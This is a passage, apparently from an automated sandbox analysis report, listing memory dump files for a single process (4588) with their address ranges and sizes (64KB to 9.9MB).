
                                                                                                                  • memory/4588-27-0x00007FF9D8440000-0x00007FF9D8E2C000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    9.9MB

                                                                                                                  • memory/4588-66-0x00007FF9D8440000-0x00007FF9D8E2C000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    9.9MB

                                                                                                                  • memory/4588-64-0x00007FF9F4AE0000-0x00007FF9F4B8E000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    696KB

                                                                                                                  • memory/4588-65-0x00007FF9F4F30000-0x00007FF9F510B000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    1.9MB

                                                                                                                  • memory/4588-54-0x00007FF9F4AE0000-0x00007FF9F4B8E000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    696KB

                                                                                                                  • memory/4588-53-0x00007FF9F4F30000-0x00007FF9F510B000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    1.9MB

                                                                                                                  • memory/4588-52-0x000002334E410000-0x000002334E43A000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    168KB

                                                                                                                  • memory/4588-45-0x0000023335850000-0x0000023335860000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                  • memory/4588-33-0x000002334E090000-0x000002334E106000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    472KB

                                                                                                                  • memory/4588-30-0x000002334DEE0000-0x000002334DF02000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    136KB

                                                                                                                  • memory/4588-29-0x0000023335850000-0x0000023335860000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                  • memory/4588-28-0x0000023335850000-0x0000023335860000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    64KB